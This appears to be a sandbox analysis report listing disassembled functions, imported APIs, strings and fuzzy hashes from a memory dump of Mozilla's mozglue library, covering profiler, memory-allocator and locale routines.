Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction ID: fa545ec4329949322bd680fc9968324518d816ccd6c396595b76251b73b351ee
Opcode Fuzzy Hash: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction Fuzzy Hash: 2F71DF70909B418BC712CF68C48055BF3F4FF99318B508A5DE84A5BB02EB31E8C6CB99

Function 6C6ADDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C6ADDCF

Part of subcall function 6C68FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C68FA4B

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE0D
free.MOZGLUE(00000000), ref: 6C6ADE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6ADEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF32

Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADB86
Part of subcall function 6C6ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C6ADC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C69DEFD,?,6C664A68), ref: 6C6ADF65
free.MOZGLUE(?), ref: 6C6ADF80

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction ID: 0ac89ea29ca3db6d5035dcbc7cb8b3ff9466a922f856cee50f87de06b4473153
Opcode Fuzzy Hash: f2df092d95e260577296db0a3cdb9637e2423cfc3afd14f3979aa36c4edf8aea
Instruction Fuzzy Hash: 4551A1726016019BD7219BA9C8806EFB3B2BF96308F95051CDD5A53B00DB31BD1BCB9E

Function 6C6B5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5DC9
std::_Facet_Register.LIBCPMT ref: 6C6B5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C6B5C8C,?,6C68E829), ref: 6C6B5E45

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction ID: d43d3134bb9ef4e9c4d1c2bb39eb2cd6776b1883bcd6658d4225881a6cacb5f0
Opcode Fuzzy Hash: a80a0959d70ab1053441ad2f8ba8cc8c8cc49a7b861ba633720c44f9999ff0e3
Instruction Fuzzy Hash: 08417C307002049FDB10DFA6C8D8AAE77F6EF89314F144169E506AB791EB30A915CB69

Function 6C68CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6531A7), ref: 6C68CDDD

Strings

<jemalloc>, xrefs: 6C68CF9F, 6C68CFB3
: (malloc) Error in VirtualFree(), xrefs: 6C68CFA4, 6C68CFB8

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction ID: 8d2d31da99423ca1da97be1f51af25de81625c11ea9824aa909d2306d991b280
Opcode Fuzzy Hash: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction Fuzzy Hash: 7131A7307422056BFB10AF668C45BAE7775BF85754F204118F612EB684DB70E501CBBD

Function 6C65ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C65ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C65EDCC
CreateFileW.KERNEL32 ref: 6C65EE08
free.MOZGLUE(00000000), ref: 6C65EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C65EE32

Part of subcall function 6C65EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C65EBB5
Part of subcall function 6C65EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C68D7F3), ref: 6C65EBC3
Part of subcall function 6C65EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C68D7F3), ref: 6C65EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C65EDC1

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction ID: 58349f6a09830bb8ba9f10bcb68811798057119605d22f8757a79b57b5dcc24a
Opcode Fuzzy Hash: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction Fuzzy Hash: F251F171E052048BDF00DF69C8806EEB7F0AF4A318F94852DE8956B740E7346959C7EA

Function 6C6CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA565

Part of subcall function 6C6CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CA4BE
Part of subcall function 6C6CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6CA6B6

Strings

0, xrefs: 6C6CA5FB
z, xrefs: 6C6CA6AE

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction ID: 04f669c28a7bbff4618a294ce90f01ccbc11bc35cfc35bd6eeabef394af0ac6b
Opcode Fuzzy Hash: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction Fuzzy Hash: 75414771A097459FC341CF29C080A8BBBE4FF8A344F408A2EF49987651EB30D549CB87

Function 6C699420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
__Init_thread_footer.LIBCMT ref: 6C69949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6C69947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C69946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C699459

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction ID: aa2c4d1473f1cb2f1ae45731b97a48eff6bf2a21c92b5f4b9591bb7a0ffbe7d0
Opcode Fuzzy Hash: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction Fuzzy Hash: C5012830A001028BD7109B5ED840A8D33B99F06B3DF054537DD0AC6B52D623F4648D5F

Function 6C65B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6AC

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C65B61E), ref: 6C65B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C65B61E,?,?,?,?,?,00000000), ref: 6C65B79A

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: b6f95eb9980117f64b0a6e82c9f44ffb228db0619a477cfe8d4454a6a340f864
Instruction ID: 25f7ad8c1ce3fb9c4c211db8e93f4453b592f1bf7e2131b02846affe1d512b41
Opcode Fuzzy Hash: b6f95eb9980117f64b0a6e82c9f44ffb228db0619a477cfe8d4454a6a340f864
Instruction Fuzzy Hash: 5C41D5B2D001159FCB04DF68DC806AFB7B5FF85324F650669E825E7780E731A9148BE9

Function 6C6CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6CB5F4
__Init_thread_footer.LIBCMT ref: 6C6CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6CB61F
std::_Facet_Register.LIBCPMT ref: 6C6CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB655

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction ID: 70af877dea57f0e7fc2c37128b4d8ba1b432833bcab7c8e056cdc96acfe85fe5
Opcode Fuzzy Hash: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction Fuzzy Hash: FB316F71B002058BCB00DFAAC8989AEB7F5EFCA325F150519D90697780DB31B906CF9E

Function 6C696590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C68FA80: GetCurrentThreadId.KERNEL32 ref: 6C68FA8D
Part of subcall function 6C68FA80: AcquireSRWLockExclusive.KERNEL32(6C6DF448), ref: 6C68FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6967C8

Part of subcall function 6C6A4290: memcpy.VCRUNTIME140(?,?,6C6B2003,6C6B0AD9,?,6C6B0AD9,00000000,?,6C6B0AD9,?,00000004,?,6C6B1A62,?,6C6B2003,?), ref: 6C6A42C4

Strings

vml, xrefs: 6C69696C
data, xrefs: 6C696593

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vml
API String ID: 511789754-3335688618
Opcode ID: 1ea53a4bcef78ae37e8f2907a97228b96f43628bc8324aa79383644413eedc8a
Instruction ID: 20ff2b914093ae74997b57c34fa08c7436a05d9ac23ef9eda6ba70f89351a345
Opcode Fuzzy Hash: 1ea53a4bcef78ae37e8f2907a97228b96f43628bc8324aa79383644413eedc8a
Instruction Fuzzy Hash: F9D1CE75A083419FD764CF25C840B9EB7E5AFC6308F10492EE58987B51EB30E949CB9B

Function 6C68D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C65EB57,?,?,?,?,?,?,?,?,?), ref: 6C68D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C65EB57,?), ref: 6C68D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C65EB57,?), ref: 6C68D673
free.MOZGLUE(?), ref: 6C68D888

Strings

|Enabled, xrefs: 6C68D81E
Wel, xrefs: 6C68D5D9, 6C68D63F

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wel$|Enabled
API String ID: 4142949111-1036103015
Opcode ID: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction ID: 73895f8debc637035f6ab12ae7658e5f5767ac23accadb84eb3d4b2661b4f139
Opcode Fuzzy Hash: dd42113ae65c5df3a0ce37b97dceeea840c04748c57847a24978f9c8794ba008
Instruction Fuzzy Hash: 14A1F2B0A012499FDF10CF69C4907EEBBF1AF4A318F58805ED885AB741C734A845CBB9

Function 6C6A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6A1DDA

Part of subcall function 6C6A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6A1F03
Part of subcall function 6C6A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6A1DF2,00000000,00000000), ref: 6C6A1F0C
Part of subcall function 6C6A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6A1DF4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction ID: 6237317cd5e8c4c48d03eaf6022813b837f2a5122011ce4a3e1288e701c1984f
Opcode Fuzzy Hash: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction Fuzzy Hash: 434167B52007019FCB10DF69C488A56BBF9FF89314F10442EE95A87B41DB31F855CB99

Function 6C6984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985AC

Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69767F
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C697693
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985B2

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction ID: b02f8cc00a9fe643691ff8c2603e189c6edef795f28809ea080049c642b51048
Opcode Fuzzy Hash: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction Fuzzy Hash: 7D218E742006029FDB14DF29C888A5AB7B5AF8930CF24492DE55BC3B51EB31F949CB59

Function 6C661640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C661699
VerSetConditionMask.NTDLL ref: 6C6616CB
VerSetConditionMask.NTDLL ref: 6C6616D7
VerSetConditionMask.NTDLL ref: 6C6616DE
VerSetConditionMask.NTDLL ref: 6C6616E5
VerSetConditionMask.NTDLL ref: 6C6616EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6616F9

Memory Dump Source

